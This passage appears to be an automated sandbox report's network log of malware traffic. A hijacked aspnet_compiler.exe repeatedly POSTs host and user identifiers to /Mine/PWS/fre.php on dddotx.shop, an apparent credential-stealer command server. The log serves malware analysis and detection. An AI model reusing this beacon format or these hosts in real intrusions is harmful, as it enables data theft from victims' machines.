Sep 25, 2024 15:29:36.192349911 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:36.930238008 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtZh7toPRDn9Iz8XFhxn%2FqKpZRx0ZpvjuTYXMe7RjKzMKFdemdNSzZKIGZGv3d2ssbPCiblQxQCUHGqAxmWWimyUFipY9yhMxrFSfX%2F6Z1xmlEGJ0na6LgdIs2VJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d33c9637cf6-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	55941	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:37.112823009 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:37.117851973 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:37.927221060 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVLO9gffFw513TPURJE3Pi%2BZ06oH96G%2BQ6n2jhJkP3B4w%2BaoEcSkz3uA57eQ2CMeaFweVrD%2FDdBOhzZaKyjJpTaNXwZ%2F7zl1HK0PsQxO2rdAFmUL6hNqTGq5sXW2QA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d3999f441ac-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	55942	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:38.093724966 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:38.099927902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:38.890101910 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR1fAnjIXCDwKIhdwof3JKV3wjGOrkPaWjYmwdeku1uPo%2FyaHfcvtwpAQtL5v9P6KSMZzvwlQZf%2FmNcwVFP%2FQ3N4rAmARZoSQp7nnfsU5fU4bzXqzEU2Hswk6EGVYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d3f9b34185d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	55943	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:39.054641008 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:39.059740067 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:39.760343075 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6BltilIzWT2n5%2Fcczdxexz4WKwAWaj05OMjCAHXqaE4GPGO8mPFd%2F7LAT3UAaF5Iz8S0G5Osqnem9ijYHOVEC7FRK63DxuaYSmlG5ikTZpZ0fbDeE0p1krgj7xx2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d459e3817e5-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	55944	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:39.923233032 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:39.928783894 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:40.653837919 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apMp82T0nO9ffR7XuIugPgbj9Un0RMcWQLvhM0%2BosPxdqiks%2B7kR6iEWlfYP98C8JoeRwdv8YOHZhrPp8%2Fz1mLprledk3zcNvT8ujZdCt0m%2Bm5rTtkSF3Us%2BWnB%2B0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d4b1882c33f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	55945	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:40.803019047 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:40.808146954 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:41.471640110 CEST	577	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u1pODR0QjiV%2B%2F8LsODk0VD%2Fxz3hDm%2FIEw7G7obB6N4HUCw6T42F94pZz2IiBCwZL%2FYrZp%2BqwovxvPOe2Xb0OAowxBbZABJE9SvQNYhdJiS3v%2B5kb%2FNGGnr21BDeZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d509b765e67-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	55946	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:41.633367062 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:41.638242960 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:42.305742025 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdQbfRDMtURdtBogAg2xNyHD%2FQfsu4V%2BUoct7ZaUFPRmSSfbxbXRQmD%2ByNmlmbfGmNJLhiiuKA8wTbQkF6u7TlA5Y%2BkVgODQmiAI12TLo2D4KfkT3O7%2BoyiVaHzqtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d55cf8b19ff-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	55947	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:42.470592976 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:42.475610971 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:43.162539959 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiRZXFd1kQXkqEB3CsQG%2FgDKP3%2BGAk7ina8dqMfOhgtQul25Tp34GvZN71T0UDIFLmbO8ba6Z7kjnDXV4zojnk5Kbdg03eSmQOxSqmG4QTNE%2BTqqIg3BNzgciCY0pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d5afc6b0f6b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	55948	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:43.320044994 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:43.324953079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:44.096743107 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwUihD4zXVViEAIVhfOFNeVCf0rAxkL2UVcFJbs%2F1HmMYIVkR8o0nmHv2z49G5AAHZeCY%2BV5XLIqD7uwNmVKG6l5TGHux%2B1C%2B0xcXCi2yzH4sQT61KXCUGg5Q29Klw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d606d1e15af-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	55949	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:44.258714914 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:44.263622046 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:45.056214094 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6w7HtWiY8yjlEhG6rgWDfFtWZmVjqJZGUeKQ08TYNg4Z31nQbkAyoU0JOJG7fboiLhOg5OPkbOvFyQpZLq%2BJLAAKViKyNPushfZc64%2B%2BsTIOVRO2SJrd%2Fidq%2FzEHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d66294a17c1-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	55950	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:45.369345903 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:45.374185085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:46.147882938 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2uAMHVr29L0GauloR7WxDdg5NlrRYgVqmqwjyzGzzKGSm7cq0KB9lAZKkKhU4OYrg91CUyktvcspHYWV2r17zppt9NDZwx%2FV9AXO3HqDwkPuhPk9UPRJ2v3M96gkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d6dbeab42cf-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	55951	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:46.301419020 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:46.306365013 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:47.186216116 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZBpJMgSkEhUlzHQQgQee5auIXr7irW7zTO9tt5sSQjUQ58yg2w0W%2Fjd2LA9u%2FWLgbiHUAZyte3dOdECpNi3aEyVIVt7S3IABN2LBblmfvBn1hKzhkPK0kK1srwCNYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d735bdc80e2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	55952	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:47.355966091 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:47.360806942 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:48.239687920 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkZtWyEIcvjD%2BY2eIU5JJNe4X7yAvIMhL1nIcYpWRq0LpuNmVC0WkySbZ3eUhvtw0FjfmdWsheAtltlE3%2FJ9%2BlsUWHfQ%2B%2F5zGRI8dJqAZc%2BHsKs5QELro0TQoD4N2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d7a5b668c8f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	55953	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:48.409802914 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:48.414802074 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:49.512233019 CEST	581	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9D%2FZ%2FN%2FxP3SmoC5GxVLIFblR9JlPd0o2szN0te6Qq5kz9nXvvnO9RLxQp5u3FhZ%2B766%2FIGE16WufTl4D1dIrKe%2F4b35EDU8b2T%2F%2FM%2FlePmDEIi8zmhFPJf%2FKcOYwYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d804d0d8cda-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	55954	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:49.672507048 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:49.677411079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:50.344510078 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rMAb5SS%2BjDKXVQRft0%2BLVloeJplOacoHX%2BeqEsAqjcJgs95h%2FC4rewmIdHXXRcRPxJogT0eiBdkraK0HABJJeSIV9YnC0qIlefgocUlm%2F598mHnLg2%2F8JtoFesQlfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d87f96c42d3-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	55955	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:50.519201994 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:50.524173975 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
